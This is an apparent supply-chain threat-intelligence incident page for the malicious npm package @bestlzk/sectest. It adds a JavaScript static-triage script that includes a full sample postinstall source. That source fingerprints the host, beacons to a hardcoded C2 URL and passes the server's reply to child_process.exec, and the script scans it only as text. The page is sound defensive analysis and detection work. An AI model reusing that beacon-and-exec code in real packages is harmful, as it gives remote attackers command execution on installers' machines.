THREATPKG

Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in @bestlzk/sectest (npm)

@bestlzk/sectest

Risk score

92

AI summary

Indexed incident for @bestlzk/sectest (npm).

Description

On npm install, postinstall.js collects platform, Node version, current working directory, and OS username, then POSTs them as JSON to https://sec5.bestlzk.cn/v2/report. The HTTPS response body is parsed as JSON and the config.setup field is passed directly to child_process.exec, executing whatever shell command the remote server returns on the installer's machine. The package ships with empty author/description metadata and no functional library code — its sole on-install effect is this C2 beacon plus remote shell execution. This is install-time remote code execution by a hardcoded attacker endpoint.
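The behaviour above has a recognisable static shape: a lifecycle hook, empty package metadata, host fingerprinting, a hardcoded URL, JSON.parse on a response, and child_process.exec on a field of that response. The following is an added example, not code from ThreatPkg or from the package itself: a first-pass triage script that scores a package.json plus the source of the files its install hooks run, and extracts hardcoded URLs as indicators. The package.json objects and the postinstall source it scans are constructed samples that mirror the description (the sample source is only inspected as text, never executed); the assumption that a hook command names a script file the caller has already read is a convention of this example.

```javascript
// Added example (not ThreatPkg's or the package's code): static triage of npm
// lifecycle scripts for the beacon-then-exec pattern described in the incident.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic signals over source text. This is not a JS parser, so obfuscation
// evades it; it is a filter for deciding what to read by hand, not a verdict.
const SIGNALS = {
  fingerprint: /\b(?:os\.userInfo|os\.platform|os\.hostname|process\.cwd|process\.version)\b/,
  network: /\b(?:https?\.(?:request|get)|fetch)\s*\(/,
  jsonParse: /\bJSON\.parse\s*\(/,
  exec: /\bchild_process\b|\b(?:exec|execSync|spawn|spawnSync|execFile)\s*\(/,
};
// Quotes, parens and commas are excluded so a URL inside a string literal
// is captured without its delimiters.
const URL_RE = /https?:\/\/[A-Za-z0-9._~:\/?#@!$&*+;=%-]+/g;

// pkgJson: parsed package.json. scriptSources: { "<file name>": "<source>" }
// for the files referenced by the hook commands (assumed read by the caller).
function triagePackage(pkgJson, scriptSources) {
  const scripts = pkgJson.scripts || {};
  const hooks = LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string');
  const findings = [];
  const iocs = [];

  if (!pkgJson.author && !pkgJson.description) findings.push('empty-metadata');
  if (hooks.length === 0) return { hooks, findings, iocs, verdict: 'clean' };
  findings.push(`install-hook:${hooks.join(',')}`);

  let remoteExec = false;
  for (const hook of hooks) {
    // Convention assumed here: "node postinstall.js" names a file in scriptSources.
    const file = Object.keys(scriptSources).find((f) => scripts[hook].includes(f));
    if (!file) continue;
    const src = scriptSources[file];
    const hit = Object.entries(SIGNALS)
      .filter(([, re]) => re.test(src))
      .map(([name]) => name);
    if (hit.length) findings.push(`${file}:${hit.join('+')}`);
    for (const u of src.match(URL_RE) || []) iocs.push(u);
    // The dangerous shape: fetch remote data, parse it, hand a field to a shell.
    if (hit.includes('network') && hit.includes('jsonParse') && hit.includes('exec')) {
      remoteExec = true;
    }
  }
  const verdict = remoteExec
    ? 'malicious:remote-command-exec'
    : findings.length > 1 ? 'suspicious' : 'review';
  return { hooks, findings, iocs: [...new Set(iocs)], verdict };
}

// Constructed sample mirroring the described package: empty metadata, a
// postinstall hook, a C2 beacon and exec of a response field. Scanned only.
const SAMPLE_PKG = {
  name: '@bestlzk/sectest', version: '1.0.0', author: '', description: '',
  scripts: { postinstall: 'node postinstall.js' },
};
const SAMPLE_POSTINSTALL = `
const https = require('https');
const os = require('os');
const { exec } = require('child_process');
const body = JSON.stringify({ platform: os.platform(), node: process.version,
  cwd: process.cwd(), user: os.userInfo().username });
const req = https.request('https://sec5.bestlzk.cn/v2/report', { method: 'POST' }, (res) => {
  let data = '';
  res.on('data', (c) => { data += c; });
  res.on('end', () => { const cfg = JSON.parse(data); exec(cfg.config.setup); });
});
req.end(body);
`;

// Constructed benign control: a native addon with an install hook but no
// network, parse or exec of remote data. Should not be flagged as malicious.
const BENIGN_PKG = {
  name: 'native-addon', version: '2.1.0', author: 'Example Maintainer',
  description: 'Native bindings', scripts: { install: 'node-gyp rebuild' },
};

console.log(JSON.stringify(triagePackage(SAMPLE_PKG, { 'postinstall.js': SAMPLE_POSTINSTALL }), null, 2));
console.log(JSON.stringify(triagePackage(BENIGN_PKG, {}), null, 2));
```

The sample package scores `malicious:remote-command-exec` with the report URL extracted as its indicator, while the benign control only lands in `review` because an install hook by itself is common in native packages. The operational mitigation for this whole class is to stop hooks from running at all during dependency installation (`npm install --ignore-scripts`, or `ignore-scripts=true` in `.npmrc`) and to run triage like this on packages that genuinely need them.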

Technical details

Affected versions

= 1.0.0

Indicators

  • affected version = 1.0.0 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents